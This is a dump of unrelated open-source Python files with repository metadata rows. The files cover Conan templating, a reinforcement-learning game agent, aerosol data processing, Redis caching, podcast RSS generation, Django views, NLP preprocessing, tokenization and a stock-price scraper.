def imports(self):
self.copy("*.dll", dst="bin", src="bin")
self.copy("*.dylib*", dst="bin", src="lib")
self.copy('*.so*', dst='bin', src='lib')
def test(self):
os.chdir("bin")
self.run(".%sexample" % os.sep)
"""
test_cmake = """project(PackageTest CXX)
cmake_minimum_required(VERSION 2.8.12)
include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)
conan_basic_setup()
add_executable(example example.cpp)
target_link_libraries(example ${CONAN_LIBS})
# CTest is a testing tool that can be used to test your project.
# enable_testing()
# add_test(NAME example
# WORKING_DIRECTORY ${CMAKE_BINARY_DIR}/bin
# COMMAND example)
"""
test_main = """#include <iostream>
#include "hello.h"
int main() {
hello();
}
"""
hello_h = """#pragma once
#ifdef WIN32
#define HELLO_EXPORT __declspec(dllexport)
#else
#define HELLO_EXPORT
#endif
HELLO_EXPORT void hello();
"""
hello_cpp = """#include <iostream>
#include "hello.h"
void hello(){
#ifdef NDEBUG
std::cout << "Hello World Release!" <<std::endl;
#else
std::cout << "Hello World Debug!" <<std::endl;
#endif
}
"""
cmake = """project(MyHello CXX)
cmake_minimum_required(VERSION 2.8)
include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)
conan_basic_setup()
add_library(hello hello.cpp)
"""
gitignore_template = """
*.pyc
test_package/build
"""
def cmd_new(ref, header=False, pure_c=False, test=False, exports_sources=False, bare=False,
visual_versions=None, linux_gcc_versions=None, linux_clang_versions=None, osx_clang_versions=None,
shared=None, upload_url=None, gitignore=None, gitlab_gcc_versions=None, gitlab_clang_versions=None):
try:
tokens = ref.split("@")
name, version = tokens[0].split("/")
if len(tokens) == 2:
user, channel = tokens[1].split("/")
else:
user, channel = "user", "channel"
pattern = re.compile('[\W_]+')
package_name = pattern.sub('', name).capitalize()
except ValueError:
raise ConanException("Bad parameter, please use full package name,"
"e.g: MyLib/1.2.3@user/testing")
# Validate it is a valid reference
ConanFileReference(name, version, user, channel)
if header and exports_sources:
raise ConanException("'header' and 'sources' are incompatible options")
if pure_c and (header or exports_sources):
raise ConanException("'pure_c' is incompatible with 'header' and 'sources'")
if bare and (header or exports_sources):
raise ConanException("'bare' is incompatible with 'header' and 'sources'")
if header:
files = {"conanfile.py": conanfile_header.format(name=name, version=version,
package_name=package_name)}
elif exports_sources:
files = {"conanfile.py": conanfile_sources.format(name=name, version=version,
package_name=package_name),
"src/hello.cpp": hello_cpp,
"src/hello.h": hello_h,
"src/CMakeLists.txt": cmake}
elif bare:
files = {"conanfile.py": conanfile_bare.format(name=name, version=version,
package_name=package_name)}
else:
files = {"conanfile.py": conanfile.format(name=name, version=version,
package_name=package_name)}
if pure_c:
config = "\n def configure(self):\n del self.settings.compiler.libcxx"
files["conanfile.py"] = files["conanfile.py"] + config
if test:
files["test_package/conanfile.py"] = test_conanfile.format(name=name, version=version,
user=user, channel=channel,
package_name=package_name)
files["test_package/CMakeLists.txt"] = test_cmake
files["test_package/example.cpp"] = test_main
if gitignore:
files[".gitignore"] = gitignore_template
files.update(ci_get_files(name, version, user, channel, visual_versions,
linux_gcc_versions, linux_clang_versions,
osx_clang_versions, shared, upload_url,
gitlab_gcc_versions, gitlab_clang_versions))
return files
| mit | -2,767,009,680,822,622,700 | 32.51087 | 112 | 0.601362 | false | 3.632757 | true | false | false |
grschafer/BejeweledBot | train/agent.py | 1 | 2406 | from pybrain.rl.agents.logging import LoggingAgent
from pybrain.rl.agents.learning import LearningAgent
from scipy import where
from random import choice
class BejeweledAgent(LearningAgent):
def getAction(self):
# get best action for every state observation
# overlay all action values for every state observation, pick best
LoggingAgent.getAction(self)
# for each color, get best action, then pick highest-value action
# among those actions
actions = []
values = []
# TODO: why are same values printed many times in a row here?
#print '========== in agent =========='
#print 'states:', [[i] for i in self.lastobs.flatten()]
for state in self.lastobs:
#print 'state:', state
actions.append(self.module.activate(state))
values.append(self.module.lastMaxActionValue)
#self.module.printState(state)
#print ' best:', actions[-1], 'value:', values[-1]
actionIdx = where(values == max(values))[0]
ch = choice(actionIdx)
self.lastaction = actions[ch]
self.bestState = self.lastobs[ch]
#print 'assigning reward to state', self.bestState
#print 'chosen action:', self.lastaction, 'value:', max(values)
# add a chance to pick a random other action
if self.learning:
self.lastaction = self.learner.explore(self.lastobs, self.lastaction)
#print 'after explorer:', self.lastaction
#print '============= end ============'
return self.lastaction
def giveReward(self, r):
"""Step 3: store observation, action and reward in the history dataset. """
# step 3: assume that state and action have been set
assert self.lastobs != None
assert self.lastaction != None
assert self.lastreward == None
self.lastreward = r
# store state, action and reward in dataset if logging is enabled
if self.logging:
# TODO: assigning reward to only best estimate for now
#for state in self.lastobs:
# TODO: assign reward to state correctly? NO because we're in
# the learner -- learning will be slower though, because of
# false positives for every obs
self.history.addSample(self.bestState, self.lastaction, self.lastreward)
| mit | 1,512,328,622,695,829,200 | 41.210526 | 88 | 0.618038 | false | 4.311828 | false | false | false |
annahs/atmos_research | LEO_calc_coating_from_meas_scat_amp_and_write_to_db.py | 1 | 3857 | import sys
import os
import datetime
import pickle
import numpy as np
import matplotlib.pyplot as plt
from pprint import pprint
import sqlite3
import calendar
from datetime import datetime
#id INTEGER PRIMARY KEY AUTOINCREMENT,
#sp2b_file TEXT,
#file_index INT,
#instr TEXT,
#instr_locn TEXT,
#particle_type TEXT,
#particle_dia FLOAT,
#unix_ts_utc FLOAT,
#actual_scat_amp FLOAT,
#actual_peak_pos INT,
#FF_scat_amp FLOAT,
#FF_peak_pos INT,
#FF_gauss_width FLOAT,
#zeroX_to_peak FLOAT,
#LF_scat_amp FLOAT,
#incand_amp FLOAT,
#lag_time_fit_to_incand FLOAT,
#LF_baseline_pct_diff FLOAT,
#rBC_mass_fg FLOAT,
#coat_thickness_nm FLOAT,
#coat_thickness_from_actual_scat_amp FLOAT
#UNIQUE (sp2b_file, file_index, instr)
#connect to database
conn = sqlite3.connect('C:/projects/dbs/SP2_data.db')
c = conn.cursor()
c2 = conn.cursor()
instrument = 'UBCSP2'
instrument_locn = 'WHI'
type_particle = 'incand'
start_date = '20110105'
end_date = '20120601'
lookup_file = 'C:/Users/Sarah Hanna/Documents/Data/WHI long term record/coatings/lookup_tables/coating_lookup_table_WHI_2012_UBCSP2-nc(2p26,1p26).lupckl'
rBC_density = 1.8
incand_sat = 3750
lookup = open(lookup_file, 'r')
lookup_table = pickle.load(lookup)
lookup.close()
c.execute('''SELECT * FROM SP2_coating_analysis''')
names = [description[0] for description in c.description]
pprint(names)
begin_data = calendar.timegm(datetime.strptime(start_date,'%Y%m%d').timetuple())
end_data = calendar.timegm(datetime.strptime(end_date,'%Y%m%d').timetuple())
def get_rBC_mass(incand_pk_ht, year):
if year == 2012:
rBC_mass = 0.003043*incand_pk_ht + 0.24826 #AD corrected linear calibration for UBCSP2 at WHI 2012
if year == 2010:
rBC_mass = 0.01081*incand_pk_ht - 0.32619 #AD corrected linear calibration for ECSP2 at WHI 2010
return rBC_mass
def get_coating_thickness(BC_VED,scat_amp,coating_lookup_table):
#get the coating thicknesses from the lookup table which is a dictionary of dictionaries, the 1st keyed with BC core size and the second being coating thicknesses keyed with calc scat amps
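	#rough illustrative sketch of the assumed structure (numbers below are made up, not taken from the real lookup table):
	#  coating_lookup_table = {80.0: {1200.0: 10.0, 2500.0: 40.0},   # core VED (nm) -> {calc scat amp -> coating thickness (nm)}
	#                          120.0: {1500.0: 20.0, 3000.0: 55.0}}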
core_diameters = sorted(coating_lookup_table.keys())
prev_diameter = core_diameters[0]
for core_diameter in core_diameters:
if core_diameter > BC_VED:
core_dia_to_use = prev_diameter
break
prev_diameter = core_diameter
#now get the coating thickness for the scat_amp this is the coating thickness based on the raw scattering max
scattering_amps = sorted(coating_lookup_table[core_dia_to_use].keys())
prev_amp = scattering_amps[0]
for scattering_amp in scattering_amps:
if scat_amp < scattering_amp:
scat_amp_to_use = prev_amp
break
prev_amp = scattering_amp
scat_coating_thickness = coating_lookup_table[core_dia_to_use].get(scat_amp_to_use, np.nan) # returns value for the key, or none
return scat_coating_thickness
LOG_EVERY_N = 10000
i = 0
for row in c.execute('''SELECT incand_amp, LF_scat_amp, unix_ts_utc, sp2b_file, file_index, instr FROM SP2_coating_analysis
WHERE instr=? and instr_locn=? and particle_type=? and incand_amp<? and unix_ts_utc>=? and unix_ts_utc<?''',
(instrument,instrument_locn,type_particle,incand_sat,begin_data,end_data)):
incand_amp = row[0]
LF_amp = row[1]
event_time = datetime.utcfromtimestamp(row[2])
file = row[3]
index = row[4]
instrt = row[5]
rBC_mass = get_rBC_mass(incand_amp, event_time.year)
if rBC_mass >= 0.25:
rBC_VED = (((rBC_mass/(10**15*rBC_density))*6/3.14159)**(1/3.0))*10**7 #VED in nm with 10^15fg/g and 10^7nm/cm
coat_th = get_coating_thickness(rBC_VED,LF_amp,lookup_table)
else:
rBC_VED = None
coat_th = None
c2.execute('''UPDATE SP2_coating_analysis SET coat_thickness_from_actual_scat_amp=? WHERE sp2b_file=? and file_index=? and instr=?''', (coat_th, file,index,instrt))
i+=1
if (i % LOG_EVERY_N) == 0:
print 'record: ', i
conn.commit()
conn.close()
| mit | -3,604,193,547,735,604,000 | 29.611111 | 207 | 0.721027 | false | 2.674757 | false | false | false |
LPgenerator/django-cacheops | cacheops/redis.py | 1 | 3494 | from __future__ import absolute_import
import warnings
from contextlib import contextmanager
import six
from funcy import decorator, identity, memoize, LazyObject
import redis
from redis.sentinel import Sentinel
from .conf import settings
if settings.CACHEOPS_DEGRADE_ON_FAILURE:
@decorator
def handle_connection_failure(call):
try:
return call()
except redis.ConnectionError as e:
warnings.warn("The cacheops cache is unreachable! Error: %s" % e, RuntimeWarning)
except redis.TimeoutError as e:
warnings.warn("The cacheops cache timed out! Error: %s" % e, RuntimeWarning)
else:
handle_connection_failure = identity
LOCK_TIMEOUT = 60
class CacheopsRedis(redis.StrictRedis):
get = handle_connection_failure(redis.StrictRedis.get)
@contextmanager
def getting(self, key, lock=False):
if not lock:
yield self.get(key)
else:
locked = False
try:
data = self._get_or_lock(key)
locked = data is None
yield data
finally:
if locked:
self._release_lock(key)
@handle_connection_failure
def _get_or_lock(self, key):
self._lock = getattr(self, '_lock', self.register_script("""
local locked = redis.call('set', KEYS[1], 'LOCK', 'nx', 'ex', ARGV[1])
if locked then
redis.call('del', KEYS[2])
end
return locked
"""))
signal_key = key + ':signal'
while True:
data = self.get(key)
if data is None:
if self._lock(keys=[key, signal_key], args=[LOCK_TIMEOUT]):
return None
elif data != b'LOCK':
return data
# No data and not locked, wait
self.brpoplpush(signal_key, signal_key, timeout=LOCK_TIMEOUT)
@handle_connection_failure
def _release_lock(self, key):
self._unlock = getattr(self, '_unlock', self.register_script("""
if redis.call('get', KEYS[1]) == 'LOCK' then
redis.call('del', KEYS[1])
end
redis.call('lpush', KEYS[2], 1)
redis.call('expire', KEYS[2], 1)
"""))
signal_key = key + ':signal'
self._unlock(keys=[key, signal_key])
@LazyObject
def redis_client():
if settings.CACHEOPS_SENTINEL and isinstance(settings.CACHEOPS_SENTINEL, dict):
sentinel = Sentinel(
settings.CACHEOPS_SENTINEL['location'],
socket_timeout=settings.CACHEOPS_SENTINEL.get('socket_timeout')
)
return sentinel.master_for(
settings.CACHEOPS_SENTINEL['service_name'],
redis_class=CacheopsRedis,
db=settings.CACHEOPS_SENTINEL.get('db') or 0
)
# Allow client connection settings to be specified by a URL.
if isinstance(settings.CACHEOPS_REDIS, six.string_types):
return CacheopsRedis.from_url(settings.CACHEOPS_REDIS)
else:
return CacheopsRedis(**settings.CACHEOPS_REDIS)
### Lua script loader
import re
import os.path
STRIP_RE = re.compile(r'TOSTRIP.*/TOSTRIP', re.S)
@memoize
def load_script(name, strip=False):
filename = os.path.join(os.path.dirname(__file__), 'lua/%s.lua' % name)
with open(filename) as f:
code = f.read()
if strip:
code = STRIP_RE.sub('', code)
return redis_client.register_script(code)
| bsd-3-clause | -5,793,251,046,439,883,000 | 29.382609 | 93 | 0.591013 | false | 3.886541 | false | false | false |
rhhayward/podcast_generator | podcast_generator/PodcastCreator.py | 1 | 4935 | import urllib.request as urllib
from lxml import etree
import os
from os.path import basename
from urllib.parse import urlparse
### PodcastCreator is the class that
### takes a set of downloaders,
### sets their settings, takes
### their downloaded files and
### makes them into an rss file
### for use with podcast
### aggregators.
class PodcastCreator:
""" takes a list of files, creates an output xml file for use with podcatcher """
def __init__(self):
self.files = []
self.outputFile = ""
self.title = ""
self.link = ""
self.enclosureBaseUrl = ""
self.db = None
self.destFolder = None
self.maxCount = None
self.downloaders = []
os.chdir("/tmp")
### addDownloader takes a PodcastDownloader
### object, sets its dest folder and
### db, and adds it to the list of
### available downloaders.
def addDownloader(self, Downloader):
if not self.destFolder is None:
Downloader.setDestFolder(self.destFolder)
if not self.db is None:
Downloader.useDb(self.db)
self.downloaders.append(Downloader)
### getFiles iterates through all
### the available downloaders,
### set their maxCount to our
### maxCount, and decrement our
### maxCount by however many
### the downloader got.
def getFiles(self):
downloadedCount=0
for downloader in self.downloaders:
if(self.maxCount is not None and downloader.maxCount is None):
downloader.setMaxCount(self.maxCount)
count = downloader.getFiles()
downloadedCount += count
if(self.maxCount is not None):
self.maxCount -= count
return downloadedCount
### setMaxCount is an accessor function
### for the maxCount which regulates
### the number of files to download.
def setMaxCount(self, count):
self.maxCount = count;
    ### setDestFolder takes a destination
### folder to move files to after
### they've been downloaded.
def setDestFolder(self, destFolder):
self.destFolder = destFolder
### useDb is an accessor function
### for the podcast database object.
def useDb(self, db):
self.db = db
### setLink is used in the rss file for
### the rss link tag.
def setLink(self, link):
self.link = link
### setEnclosureBaseUrl is where the
### files will be avilable for http
### download.
def setEnclosureBaseUrl(self, enclosureBaseUrl):
self.enclosureBaseUrl = enclosureBaseUrl
### setOutputXmlFile is the location
### where the rss file will be written.
def setOutputXmlFile(self, updatedOutputFile):
self.outputFile = updatedOutputFile
### setTitle sets the title of the rss
### file.
def setTitle(self, title):
self.title = title
### writeOutputFile generates the output
### xml file.
def writeOutputFile(self):
self.podcasts = self.db.getPodcastsFromDb()
fh = open(self.outputFile, "wb")
rss = etree.Element("rss")
channel = etree.SubElement(rss, "channel")
etree.SubElement(channel, "title").text = self.title
etree.SubElement(channel, "description").text = self.title
etree.SubElement(channel, "link").text = self.link
etree.SubElement(channel, "language").text = "en-us"
etree.SubElement(channel, "copyright").text = "Copyright 2999"
for podcast in self.podcasts:
file = podcast.getFileName()
pubDate = podcast.getDate()
item = etree.SubElement(channel, "item")
etree.SubElement(item, "enclosure").set("url", self.enclosureBaseUrl + urllib.quote(file))
etree.SubElement(item, "category").text = "Podcasts"
etree.SubElement(item, "pubDate").text = pubDate
etree.SubElement(item, "guid").text = self.enclosureBaseUrl + urllib.quote(file)
titleAdded = False
for field in podcast.getAdditionalFields():
if field['fieldName'] == "title":
titleAdded = True
etree.SubElement(item, field['fieldName']).text = field['fieldValue']
if titleAdded == False:
etree.SubElement(item, "title").text = file
fh.write(etree.tostring(rss, encoding='UTF-8', xml_declaration=True, pretty_print=True))
fh.close()
### cleanupFiles takes a number of days before
### today to remove files from the fs and db
### Returns count of files removeD
def cleanupFiles(self, count):
files = self.db.cleanupFiles(count)
for file in files:
try:
os.unlink(self.destFolder+file)
except:
"there was a problem removing file " + self.destFolder+file
| gpl-3.0 | 4,101,729,319,851,635,700 | 34.25 | 102 | 0.61459 | false | 4.122807 | false | false | false |
cefn/firmware-codesign-readinglog | ui/index.py | 1 | 2487 | #!/usr/bin/python
import sys,os,glob,urlparse,urllib,subprocess
def setcwd():
realpath = os.path.realpath(sys.argv[0])
dname = os.path.dirname(realpath)
os.chdir(dname)
# sets working directory based on path to index.py
setcwd()
# loads local python modules, relative to index.py
sys.path.append(os.path.realpath('py'))
from logx import Viewer,Editor,debug_trace
'''
from PyQt5 import uic
from PyQt5.QtWidgets import QApplication
'''
from PyQt4 import uic
from PyQt4.QtGui import QApplication
from PyQt4.QtCore import QObject,pyqtSlot
notesdir = "../notes"
pdfdir = "../papers"
startquery = "./xq/index.xq"
class PdfAdaptor(QObject):
@pyqtSlot(str)
def loadid(self, pdfid):
pdfid = str(pdfid)
pdfpath = pdfdir + os.sep + pdfid + '.pdf'
self.loadpdf(pdfpath)
@pyqtSlot(str)
def loadpdf(self, pdfpath):
pdfpath = str(pdfpath)
pdfpath = os.path.realpath(pdfpath)
subprocess.Popen(['xdg-open', pdfpath])
def path2url(path):
return urlparse.urljoin(
'file:', urllib.pathname2url(path))
def main(argv):
querypath = os.path.realpath(startquery)
sourcedir = os.path.realpath(notesdir)
sourcepaths = glob.glob(sourcedir + "/*.html")
# for PyQt4
sourceurls = ",".join([("file://" + path) for path in sourcepaths])
# for PyQt5
#sourceurls = ",".join([path2url(path) for path in sourcepaths])
xquerynames = [
['sourceurls', sourceurls,'http://cefn.com/logx']
]
javascriptnames = dict()
# create application context
app = QApplication(sys.argv)
ui = uic.loadUi('index.ui')
editor = Editor(focuspath=None,view=ui.editView,javascriptnames=javascriptnames,xquerynames=xquerynames)
viewer = Viewer(querypath=querypath,view=ui.navView,javascriptnames=javascriptnames,xquerynames=xquerynames)
pdf = PdfAdaptor()
javascriptnames['editor']=editor
javascriptnames['viewer']=viewer
javascriptnames['pdf']=pdf
# subscribe viewer to refresh whenever source files refresh
# implicitly bound through 'sourcepaths' xquery name
for sourcepath in sourcepaths:
viewer.registersource(sourcepath)
ui.show()
# edit a notes file, if specified
if len(argv) > 0:
editor.focuspath = os.path.realpath(argv[0])
# load the view
viewer.render()
sys.exit(app.exec_())
if __name__ == "__main__":
main(sys.argv[1:]) | mit | -1,832,972,551,694,617,600 | 24.916667 | 112 | 0.657821 | false | 3.522663 | false | false | false |
jason-neal/spectrum_overload | spectrum_overload/differential.py | 1 | 1536 | # -*- coding: utf-8 -*-
"""Differential Class which takes the difference between two spectra."""
from typing import Any, Dict, Optional
from spectrum_overload.spectrum import Spectrum
# TODO: Add in s-profile from
# Ferluga 1997: Separating the spectra of binary stars-I. A simple method: Secondary reconstruction
class DifferentialSpectrum(object):
"""A differential spectrum."""
def __init__(self, Spectrum1: Spectrum, Spectrum2: Spectrum) -> None:
"""Initialise class with both spectra."""
if not (Spectrum1.calibrated and Spectrum2.calibrated):
raise ValueError("Input spectra are not calibrated.")
self.spec1 = Spectrum1
self.spec2 = Spectrum2
self.params = None # type: Optional[Dict[str, Any]]
def barycentric_correct(self):
"""Barycentric correct each spectra."""
pass
def rest_frame(self, frame):
"""Change rest frame to one of the spectra."""
pass
def diff(self):
"""Calculate difference between the two spectra."""
# TODO: Access interpolations
return self.spec1 - self.spec2
def sort(self, method: str = "time"):
"""Sort spectra in specific order. e.g. time, reversed."""
pass
def swap(self):
"""Swap order of the two spectra."""
self.spec1, self.spec2 = self.spec2, self.spec1
def add_orbital_params(self, params: Dict[str, Any]):
"""A dictionary of orbital parameters to use for shifting frames."""
self.params = params
| mit | 1,857,235,720,947,687,000 | 31.680851 | 99 | 0.646484 | false | 3.938462 | false | false | false |
sidrakesh93/grpc-tools | benchmarking/performance_db/performance_db_frontend/app/views.py | 1 | 3289 | #
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""View for the front-end."""
from django import shortcuts
from user_data import UserData
user_data = UserData()
def display_performance_database(request):
"""View for performance database table page."""
data = user_data.get_all_users_data()
return shortcuts.render(request, 'data_table.html', {'all_users_data': data})
def display_configs(request):
"""View for config page."""
return shortcuts.render(request, 'configs.html', {})
def display_general_statistic(request, metric):
"""View for general statistic page."""
return general_statistic_renderer(request, metric)
def general_statistic_renderer(request, metric):
"""General statistic page renderer."""
data = user_data.get_all_users_single_metric_data(metric)
return shortcuts.render(
request, 'general_plots.html',
{'metric': get_metric_full_desc(metric),
'all_users_data': data})
def display_user_metrics(request, username):
"""View for user metrics page."""
complete_data = user_data.get_single_user_data(username)
return shortcuts.render(
request, 'user_plots.html',
{'username': complete_data[0],
'user_data': complete_data[1]})
def get_metric_full_desc(metric):
"""Returns full metric name."""
metric_name = {
'qps': 'Queries Per Second',
'qpspercore': 'QPS Per Core',
'perc50': '50th Percentile Latency',
'perc90': '90th Percentile Latency',
'perc95': '95th Percentile Latency',
'perc99': '99th Percentile Latency',
'perc99point9': '99.9th Percentile Latency',
'serversystime': 'Server System Time',
'serverusertime': 'Server User Time',
'clientsystime': 'Client System Time',
'clientusertime': 'Client User Time'
}[metric]
return metric_name
| bsd-3-clause | 2,365,342,280,328,738,000 | 35.544444 | 79 | 0.725753 | false | 4.025704 | false | false | false |
faneshion/MatchZoo | matchzoo/engine/base_preprocessor.py | 1 | 4116 | """:class:`BasePreprocessor` define input and ouutput for processors."""
import abc
import functools
import typing
from pathlib import Path
import dill
import matchzoo as mz
def validate_context(func):
"""Validate context in the preprocessor."""
@functools.wraps(func)
def transform_wrapper(self, *args, **kwargs):
if not self.context:
raise ValueError('Please call `fit` before calling `transform`.')
return func(self, *args, **kwargs)
return transform_wrapper
class BasePreprocessor(metaclass=abc.ABCMeta):
"""
    :class:`BasePreprocessor` to handle input data.
A preprocessor should be used in two steps. First, `fit`, then,
`transform`. `fit` collects information into `context`, which includes
everything the preprocessor needs to `transform` together with other
useful information for later use. `fit` will only change the
preprocessor's inner state but not the input data. In contrast,
`transform` returns a modified copy of the input data without changing
the preprocessor's inner state.
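
    A minimal usage sketch (illustrative only -- it assumes a concrete
    subclass such as :class:`DSSMPreprocessor` and an existing
    :class:`DataPack` named `train_pack`)::

        preprocessor = mz.preprocessors.DSSMPreprocessor()
        train_pack_processed = preprocessor.fit_transform(train_pack)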
"""
DATA_FILENAME = 'preprocessor.dill'
def __init__(self):
"""Initialization."""
self._context = {}
@property
def context(self):
"""Return context."""
return self._context
@abc.abstractmethod
def fit(
self,
data_pack: 'mz.DataPack',
verbose: int = 1
) -> 'BasePreprocessor':
"""
Fit parameters on input data.
This method is an abstract base method, need to be
implemented in the child class.
This method is expected to return itself as a callable
object.
        :param data_pack: :class:`DataPack` object to be fitted.
:param verbose: Verbosity.
"""
@abc.abstractmethod
def transform(
self,
data_pack: 'mz.DataPack',
verbose: int = 1
) -> 'mz.DataPack':
"""
Transform input data to expected manner.
This method is an abstract base method, need to be
implemented in the child class.
        :param data_pack: :class:`DataPack` object to be transformed,
            or a list of text-left, text-right tuples.
        :param verbose: Verbosity.
"""
def fit_transform(
self,
data_pack: 'mz.DataPack',
verbose: int = 1
) -> 'mz.DataPack':
"""
Call fit-transform.
:param data_pack: :class:`DataPack` object to be processed.
:param verbose: Verbosity.
"""
return self.fit(data_pack, verbose=verbose) \
.transform(data_pack, verbose=verbose)
def save(self, dirpath: typing.Union[str, Path]):
"""
Save the :class:`DSSMPreprocessor` object.
        A saved :class:`DSSMPreprocessor` is represented as a directory with
        the `context` object (fitted parameters on training data); it will
        be saved with `dill`.
:param dirpath: directory path of the saved :class:`DSSMPreprocessor`.
"""
dirpath = Path(dirpath)
data_file_path = dirpath.joinpath(self.DATA_FILENAME)
if data_file_path.exists():
raise FileExistsError(
f'{data_file_path} instance exist, fail to save.')
elif not dirpath.exists():
dirpath.mkdir()
dill.dump(self, open(data_file_path, mode='wb'))
@classmethod
def _default_units(cls) -> list:
"""Prepare needed process units."""
return [
mz.preprocessors.units.tokenize.Tokenize(),
mz.preprocessors.units.lowercase.Lowercase(),
mz.preprocessors.units.punc_removal.PuncRemoval(),
]
def load_preprocessor(dirpath: typing.Union[str, Path]) -> 'mz.DataPack':
"""
Load the fitted `context`. The reverse function of :meth:`save`.
:param dirpath: directory path of the saved model.
:return: a :class:`DSSMPreprocessor` instance.
"""
dirpath = Path(dirpath)
data_file_path = dirpath.joinpath(BasePreprocessor.DATA_FILENAME)
return dill.load(open(data_file_path, 'rb'))
| apache-2.0 | -928,447,038,971,826,800 | 28.191489 | 78 | 0.622449 | false | 4.20429 | false | false | false |
hugdiniz/anuarioDjango | yearbook/migrations/0005_auto_20141214_0017.py | 1 | 1444 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('yearbook', '0004_auto_20141212_1558'),
]
operations = [
migrations.RemoveField(
model_name='lotacao',
name='comentarios',
),
migrations.AddField(
model_name='pessoa',
name='historico',
field=models.ManyToManyField(related_name=b'lotacoes_anteriores', to='yearbook.Lotacao', blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='unidade_organizacional',
name='localidade_sala',
field=models.ForeignKey(blank=True, to='yearbook.Sala', null=True),
preserve_default=True,
),
migrations.AlterField(
model_name='lotacao',
name='funcao',
field=models.ForeignKey(blank=True, to='yearbook.Funcao', null=True),
),
migrations.AlterField(
model_name='pessoa',
name='ferias_fim',
field=models.DateTimeField(null=True, verbose_name=b'fim das ferias', blank=True),
),
migrations.AlterField(
model_name='pessoa',
name='ferias_inicio',
field=models.DateTimeField(null=True, verbose_name=b'inicio das ferias', blank=True),
),
]
| gpl-2.0 | -4,371,260,729,932,835,000 | 31.088889 | 113 | 0.572022 | false | 3.871314 | false | false | false |
MeteorKepler/RICGA | ricga/eval_tools/pycocoevalcap/tokenizer/ptbtokenizer.py | 1 | 2833 | #!/usr/bin/env python
#
# File Name : ptbtokenizer.py
#
# Description : Do the PTB Tokenization and remove punctuations.
#
# Creation Date : 29-12-2014
# Last Modified : Thu Mar 19 09:53:35 2015
# Authors : Hao Fang <[email protected]> and Tsung-Yi Lin <[email protected]>
import os
import subprocess
import tempfile
# path to the stanford corenlp jar
STANFORD_CORENLP_3_4_1_JAR = 'stanford-corenlp-3.4.1.jar'
# punctuations to be removed from the sentences
PUNCTUATIONS = ["''", "'", "``", "`", "-LRB-", "-RRB-", "-LCB-", "-RCB-", \
".", "?", "!", ",", ":", "-", "--", "...", ";"]
class PTBTokenizer:
"""Python wrapper of Stanford PTBTokenizer"""
def tokenize(self, captions_for_image):
cmd = ['java', '-cp', STANFORD_CORENLP_3_4_1_JAR, \
'edu.stanford.nlp.process.PTBTokenizer', \
'-preserveLines', '-lowerCase']
# ======================================================
# prepare data for PTB Tokenizer
# ======================================================
final_tokenized_captions_for_image = {}
image_id = [k for k, v in captions_for_image.items() for _ in range(len(v))]
sentences = '\n'.join([c['caption'].replace('\n', ' ') for k, v in captions_for_image.items() for c in v])
# ======================================================
# save sentences to temporary file
# ======================================================
path_to_jar_dirname = os.path.dirname(os.path.abspath(__file__))
tmp_file = tempfile.NamedTemporaryFile(delete=False, dir=path_to_jar_dirname)
tmp_file.write(sentences)
tmp_file.close()
# ======================================================
# tokenize sentence
# ======================================================
cmd.append(os.path.basename(tmp_file.name))
p_tokenizer = subprocess.Popen(cmd, cwd=path_to_jar_dirname, \
stdout=subprocess.PIPE)
token_lines = p_tokenizer.communicate(input=sentences.rstrip())[0]
lines = token_lines.split('\n')
# remove temp file
os.remove(tmp_file.name)
# ======================================================
# create dictionary for tokenized captions
# ======================================================
for k, line in zip(image_id, lines):
if not k in final_tokenized_captions_for_image:
final_tokenized_captions_for_image[k] = []
tokenized_caption = ' '.join([w for w in line.rstrip().split(' ') \
if w not in PUNCTUATIONS])
final_tokenized_captions_for_image[k].append(tokenized_caption)
return final_tokenized_captions_for_image
| apache-2.0 | 4,010,289,009,320,253,400 | 41.283582 | 114 | 0.484998 | false | 3.907586 | false | false | false |
guoxiaoyong/simple-useful | cxx_learn/cronx/spider/spider_daily_ftse100.py | 2 | 2199 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2;
import re;
import string;
import sys;
from BeautifulSoup import BeautifulSoup
month_num = {
'Jan' : '01',
'Feb' : '02',
'Mar' : '03',
'Apr' : '04',
'May' : '05',
'Jun' : '06',
'Jul' : '07',
'Aug' : '08',
'Sep' : '09',
'Oct' : '10',
'Nov' : '11',
'Dec' : '12'
};
def process_date(raw_date):
global month_num;
raw_list=raw_date.split(' ');
month_str=month_num[raw_list[0]];
day_list=raw_list[1].split(',');
if len(day_list[0]) == 1:
day_str = '0' + day_list[0];
else:
day_str = day_list[0];
year_str = raw_list[2];
return year_str + '-' + month_str + '-' + day_str;
def process_num(raw_num):
raw_list=raw_num.split(',');
sz = len(raw_list);
str_num=raw_list[0];
for i in range(1,sz):
str_num = str_num+raw_list[i];
return str_num;
str_url = "http://finance.yahoo.com/q/hp?s=%5EFTSE+Historical+Prices";
req=urllib2.Request(str_url);
resp=urllib2.urlopen(req);
respHtml=resp.read();
